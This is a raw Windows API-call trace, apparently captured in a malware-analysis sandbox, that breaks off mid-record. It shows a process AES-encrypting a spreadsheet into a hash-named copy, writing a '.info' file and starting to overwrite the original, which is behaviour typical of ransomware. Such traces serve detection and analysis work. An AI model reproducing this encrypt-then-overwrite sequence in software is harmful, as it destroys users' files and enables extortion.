1 [0076.237] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", lpFilePart=0x0) returned 0x45 [0076.238] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA", lpFilePart=0x0) returned 0x51 [0076.238] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.238] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\9ff71bf81a34ad04e697e9dce5d8a9da"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.238] GetFileType (hFile=0x36c) returned 0x1 [0076.238] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.238] GetFileType (hFile=0x36c) returned 0x1 [0076.238] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d318, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.238] CloseHandle (hObject=0x36c) returned 1 [0076.238] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA", lpFilePart=0x0) returned 0x51 [0076.238] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.238] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\9ff71bf81a34ad04e697e9dce5d8a9da"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.239] GetFileType (hFile=0x36c) returned 0x1 [0076.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.239] GetFileType (hFile=0x36c) returned 0x1 [0076.239] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d318, lpLastWriteTime=0x0) returned 1 [0076.239] CloseHandle (hObject=0x36c) returned 1 [0076.239] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA", lpFilePart=0x0) returned 0x51 [0076.239] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.239] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\9ff71bf81a34ad04e697e9dce5d8a9da"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.239] GetFileType (hFile=0x36c) returned 0x1 [0076.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.239] GetFileType (hFile=0x36c) returned 0x1 [0076.239] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d318) returned 1 [0076.239] CloseHandle (hObject=0x36c) returned 1 [0076.239] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", lpFilePart=0x0) returned 0x43 [0076.240] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", lpFilePart=0x0) returned 0x43 [0076.241] CryptAcquireContextW (in: phProv=0x1bf5d168, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5d168*=0x1a5b7910) returned 1 [0076.241] CryptImportKey (in: hProv=0x1a5b7910, pbData=0x2275da8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d120 | out: phKey=0x1bf5d120*=0x1a626e50) returned 1 [0076.241] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.241] CryptExportKey (in: hKey=0x1a626e50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5d230 | out: pbData=0x0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.241] CryptExportKey (in: hKey=0x1a626e50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2275e98, pdwDataLen=0x1bf5d230 | out: pbData=0x2275e98*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.242] CryptImportKey (in: hProv=0x1a5b7910, pbData=0x2275fb8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d0f0 | out: phKey=0x1bf5d0f0*=0x1a626de0) returned 1 [0076.242] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.242] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.242] CryptDuplicateKey (in: hKey=0x1a626de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d0e0 | out: phKey=0x1bf5d0e0*=0x1a626f30) returned 1 [0076.242] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.242] CryptSetKeyParam (hKey=0x1a626f30, dwParam=0x4, pbData=0x2276100*=0x1, dwFlags=0x0) returned 1 [0076.242] CryptSetKeyParam (hKey=0x1a626f30, dwParam=0x1, pbData=0x22760b0, dwFlags=0x0) returned 1 [0076.242] CryptDestroyKey (hKey=0x1a626de0) returned 1 [0076.242] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0076.242] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", lpFilePart=0x0) returned 0x43 [0076.242] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.242] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\gf kqmndstrhyh.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.242] GetFileType (hFile=0x36c) returned 0x1 [0076.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.242] GetFileType (hFile=0x36c) returned 0x1 [0076.242] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F", lpFilePart=0x0) returned 0x51 [0076.242] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.242] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\db1a6dcb0f41d68d7d026b82f20a081f"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a4 [0076.243] GetFileType (hFile=0x3a4) returned 0x1 [0076.243] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.243] GetFileType (hFile=0x3a4) returned 0x1 [0076.243] ReadFile (in: hFile=0x36c, lpBuffer=0x22764e0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x22764e0*, lpNumberOfBytesRead=0x1bf5d128*=0x14000, lpOverlapped=0x0) returned 1 [0076.244] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x228a4f8*, pdwDataLen=0x1bf5d180*=0x14000, dwBufLen=0x14000 | out: pbData=0x228a4f8*, pdwDataLen=0x1bf5d180*=0x14000) returned 1 [0076.245] WriteFile (in: hFile=0x3a4, lpBuffer=0x228a4f8*, nNumberOfBytesToWrite=0x14000, lpNumberOfBytesWritten=0x1bf5d118, lpOverlapped=0x0 | out: lpBuffer=0x228a4f8*, lpNumberOfBytesWritten=0x1bf5d118*=0x14000, lpOverlapped=0x0) returned 1 [0076.247] ReadFile (in: hFile=0x36c, lpBuffer=0x22764e0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x22764e0*, lpNumberOfBytesRead=0x1bf5d128*=0x369b, lpOverlapped=0x0) returned 1 [0076.247] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x229e538*, pdwDataLen=0x1bf5d180*=0x3690, dwBufLen=0x3690 | out: pbData=0x229e538*, pdwDataLen=0x1bf5d180*=0x3690) returned 1 [0076.247] WriteFile (in: hFile=0x3a4, lpBuffer=0x229e538*, nNumberOfBytesToWrite=0x3690, lpNumberOfBytesWritten=0x1bf5d118, lpOverlapped=0x0 | out: lpBuffer=0x229e538*, lpNumberOfBytesWritten=0x1bf5d118*=0x3690, lpOverlapped=0x0) returned 1 [0076.247] ReadFile (in: hFile=0x36c, lpBuffer=0x22764e0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x22764e0*, lpNumberOfBytesRead=0x1bf5d128*=0x0, lpOverlapped=0x0) returned 1 [0076.247] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22a1c08*, pdwDataLen=0x1bf5d0c0*=0x10, dwBufLen=0x10 | out: pbData=0x22a1c08*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.248] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x22a1c58*, pdwDataLen=0x1bf5d0c0*=0x0, dwBufLen=0x10 | out: pbData=0x22a1c58*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.248] WriteFile (in: hFile=0x3a4, lpBuffer=0x22a1ca8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d048, lpOverlapped=0x0 | out: lpBuffer=0x22a1ca8*, lpNumberOfBytesWritten=0x1bf5d048*=0x10, lpOverlapped=0x0) returned 1 [0076.248] CloseHandle (hObject=0x3a4) returned 1 [0076.249] CloseHandle (hObject=0x36c) returned 1 [0076.249] CryptDestroyKey (hKey=0x1a626e50) returned 1 [0076.249] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0076.249] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0076.249] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F", nBufferLength=0x105, lpBuffer=0x1bf5cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F", lpFilePart=0x0) returned 0x51 [0076.249] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d060) returned 1 [0076.249] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\db1a6dcb0f41d68d7d026b82f20a081f"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.249] GetFileType (hFile=0x36c) returned 0x1 [0076.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfd0) returned 1 [0076.250] GetFileType (hFile=0x36c) returned 0x1 [0076.250] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.251] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.252] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.253] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.254] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.254] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.254] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.254] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.254] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.255] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.255] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.255] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.255] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.255] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.255] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.255] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.255] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.255] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.256] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.256] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.256] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.256] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.256] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.256] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x6a0, lpOverlapped=0x0) returned 1 [0076.256] ReadFile (in: hFile=0x36c, lpBuffer=0x22a33b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a33b0*, lpNumberOfBytesRead=0x1bf5d148*=0x0, lpOverlapped=0x0) returned 1 [0076.256] CloseHandle (hObject=0x36c) returned 1 [0076.258] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F.info", nBufferLength=0x105, lpBuffer=0x1bf5c900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F.info", lpFilePart=0x0) returned 0x56 [0076.258] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5cde0) returned 1 [0076.258] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DB1A6DCB0F41D68D7D026B82F20A081F.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\db1a6dcb0f41d68d7d026b82f20a081f.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.263] GetFileType (hFile=0x36c) returned 0x1 [0076.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cd50) returned 1 [0076.263] GetFileType (hFile=0x36c) returned 0x1 [0076.263] WriteFile (in: hFile=0x36c, lpBuffer=0x22afa80*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5ceb8, lpOverlapped=0x0 | out: lpBuffer=0x22afa80*, lpNumberOfBytesWritten=0x1bf5ceb8*=0x77d, lpOverlapped=0x0) returned 1 [0076.264] CloseHandle (hObject=0x36c) returned 1 [0076.265] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", lpFilePart=0x0) returned 0x43 [0076.265] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d170) returned 1 [0076.265] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\gf kqmndstrhyh.xls"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d250 | out: lpFileInformation=0x1bf5d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48a34a50, ftCreationTime.dwHighDateTime=0x1d4c619, ftLastAccessTime.dwLowDateTime=0x1df29d70, ftLastAccessTime.dwHighDateTime=0x1d4c799, ftLastWriteTime.dwLowDateTime=0x1df29d70, ftLastWriteTime.dwHighDateTime=0x1d4c799, nFileSizeHigh=0x0, nFileSizeLow=0x1769b)) returned 1 [0076.265] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d130) returned 1 [0076.265] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", lpFilePart=0x0) returned 0x43 [0076.265] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", dwFileAttributes=0x80) returned 1 [0076.268] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", lpFilePart=0x0) returned 0x43 [0076.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1b0) returned 1 [0076.268] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\gf kqmndstrhyh.xls"), fInfoLevelId=0x0, lpFileInformation=0x22b7698 | out: lpFileInformation=0x22b7698*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x48a34a50, ftCreationTime.dwHighDateTime=0x1d4c619, ftLastAccessTime.dwLowDateTime=0x1df29d70, ftLastAccessTime.dwHighDateTime=0x1d4c799, ftLastWriteTime.dwLowDateTime=0x1df29d70, ftLastWriteTime.dwHighDateTime=0x1d4c799, nFileSizeHigh=0x0, nFileSizeLow=0x1769b)) returned 1 [0076.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d170) returned 1 [0076.268] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", nBufferLength=0x105, lpBuffer=0x1bf5cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls", lpFilePart=0x0) returned 0x43 [0076.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0a0) returned 1 [0076.268] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\gF KQmnDsTRHyh.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\gf kqmndstrhyh.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.268] GetFileType (hFile=0x36c) returned 0x1 [0076.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d010) returned 1 [0076.268] GetFileType (hFile=0x36c) returned 0x1 [0076.268] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.269] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.270] WriteFile (in: hFile=0x36c, lpBuffer=0x22b7b60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22b7b60*, 